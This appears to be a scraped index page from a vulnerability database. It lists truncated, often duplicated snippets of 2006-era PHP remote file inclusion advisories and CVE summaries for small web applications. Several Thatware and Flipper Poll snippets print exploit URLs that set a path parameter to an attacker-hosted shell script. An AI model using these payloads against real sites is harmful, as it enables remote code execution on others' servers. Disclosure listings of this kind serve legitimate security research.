magicnewspro.txt

==================================================================== Magic News Pro = 1.0.3 scriptpath Remote File Inclusion Exploit ==================================================================== Critical Level : Dangerous By Saudi Hackrz http://www.reamdaysoft.com...

Magic News Pro 1.0.3 - 'script_path' Remote File Inclusion

==================================================================== Magic News Pro = 1.0.3 scriptpath Remote File Inclusion Exploit ==================================================================== Critical Level : Dangerous By Saudi Hackrz http://www.reamdaysoft.com...

puma10.txt

+-------------------------------------------------------------------- + + PUMA 1.0 RC 2 config.php Remote File Inclusion + + Original advisory: + http://www.bb-pcsecurity.de/Websecurity/415/org/PUMA1.0RC2config.phpRFI.htm + +-------------------------------------------------------------------- + +...

CVE-2006-4674

Direct static code injection vulnerability in doku.php in DokuWiki before 2006-030-09c allows remote attackers to execute arbitrary PHP code via the X-FORWARDED-FOR HTTP header, which is stored in config.php...

DEBIAN-CVE-2006-4674

Direct static code injection vulnerability in doku.php in DokuWiki before 2006-030-09c allows remote attackers to execute arbitrary PHP code via the X-FORWARDED-FOR HTTP header, which is stored in config.php...

CVE-2006-4674

CVE-2006-4674 concerns DokuWiki prior to 2006-03-09c. A direct static code injection flaw in the script doku.php allows remote attackers to execute arbitrary PHP code by supplying a crafted X-FORWARDED-FOR HTTP header, which is stored in config.php. The vulnerability is characterized by an attack...

PUMA 1.0 RC 2 (config.php) Remote File Inclusion

+-------------------------------------------------------------------- + + PUMA 1.0 RC 2 config.php Remote File Inclusion + + Original advisory: + http://www.bb-pcsecurity.de/Websecurity/415/org/PUMA1.0RC2config.phpRFI.htm + +-------------------------------------------------------------------- + +...

PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability

Exploit for unknown platform in category web applications =============================================================== PUMA Declare $fpath! + - Deny direct access to config.php + - or modify code: + + if!isset$REQUEST'fpath' && !isset$GET'fpath' && !isset$POST'fpath' + //code of org. config.ph...

pheapCMS.txt

============================================================================================== Pheap CMS= lpref Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...

CVE-2006-4531

Vulnerability: PHP remote file inclusion in Pheap CMS 1.1 and earlier. Product: Pheap CMS, file lib/config.php; vector: lpref parameter taking a URL to include, enabling remote PHP code execution. Impact: potential arbitrary PHP execution on affected installations. Root cause: unsafely including ...

CVE-2006-4213

CVE-2006-4213 describes a PHP remote file inclusion vulnerability in David Kent Norman Thatware 0.4.6 (and possibly earlier). The root_path parameter can be set to an attacker-controlled URL, enabling remote PHP code execution. The connected documents confirm the root cause and impact as partial ...

Thatware <= 0.4.6 (root_path) Remote File Include Vulnerability

Exploit for unknown platform in category web applications =============================================================== Thatware = 0.4.6 rootpath Remote File Include Vulnerability =============================================================== Thatware 0.4.6 rootpath Remote File Inclusion CreW:...

Thatware 0.4.6 - &#039;ROOT_PATH&#039; Remote File Inclusion

Thatware 0.4.6 rootpath Remote File Inclusion CreW: ToXiC Bug Found by Drago84 Source Code: http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware0.4.6.tar.gz Page Affect config.php ExP: http://server/dirthatware/config.php?rootpath=http://server/shell.php' Greatz: str0ke milw0rm.com...

Thatware 0.4.6 - ROOT_PATH Remote File Inclusion

Thatware 0.4.6 - ROOTPATH Remote File Inclusion Thatware 0.4.6 rootpath Remote File Inclusion CreW: ToXiC Bug Found by Drago84 Source Code: http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware0.4.6.tar.gz Page Affect config.php ExP:...

Thatware 0.4.6 &#40;root_path&#41; Remote File Inclusion

Thatware 0.4.6 rootpath Remote File Inclusion CreW: ToXiC Bug Found by Drago84 Source Code: http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware0.4.6.tar.gz Page Affect config.php ExP: http://www.sito.com/dirthatware/config.php?rootpath=http://www.evalsite.com/shell.php' Greatz: str0ke...

phpMySms 2.0 (ROOT_PATH) Remote File Include Vulnerability

No description provided by source. PhpMySms = V2.0 ROOTPATH Remote File Include Vulnerability URL : Http://www.phpmysms.com Author=Persian-Defacer www.Hacking-Boys.com ============================================================== if $POSTmode == "1" or $GETmode == "1" include "config.php"; else...

flipper.txt

Flipper Poll rootpath Remote File Inclusion Credit : SpC-x Mail : [email protected] Site : http://wWw.SaVSaK.CoM Greetz : | TheBeKiR | Nukedx | Ejder | Str0ke | joffer | Poizonb0x | Remote File Inclusion : http://www.target.com/path/poll.php?rootpath=Command-Shell poll.PHP : includeonce$rootpath...

gshout.txt

SaVSaK.CoM | SpC-x - TheBeKiR | G Shout 1.3.1 Version - Remote File Include Vulnerability Risk : High Class: Remote Script : G Shout Credits : SpC-x Thanks : TheBeKiR - Ejder - FasTBoY - ERNE - RMx Code : include"config.php"; include"./includes/functions.inc.php"; include...

Flipper Poll &#40;root_path&#41; Remote File Inclusion

Flipper Poll rootpath Remote File Inclusion Credit : SpC-x Mail : [email protected] Site : http://wWw.SaVSaK.CoM Greetz : | TheBeKiR | Nukedx | Ejder | Str0ke | joffer | Poizonb0x | Remote File Inclusion : http://www.target.com/path/poll.php?rootpath=Command-Shell poll.PHP : includeonce$rootpath...

CVE-2006-2877

CVE-2006-2877 describes a PHP remote file inclusion in Bookmark4U 2.0.0 and earlier. An attacker can cause the application to include arbitrary PHP files via the include_prefix parameter in one of four files: inc/dbase.php, inc/config.php, inc/common.php, or inc/function.php. The advisory notes t...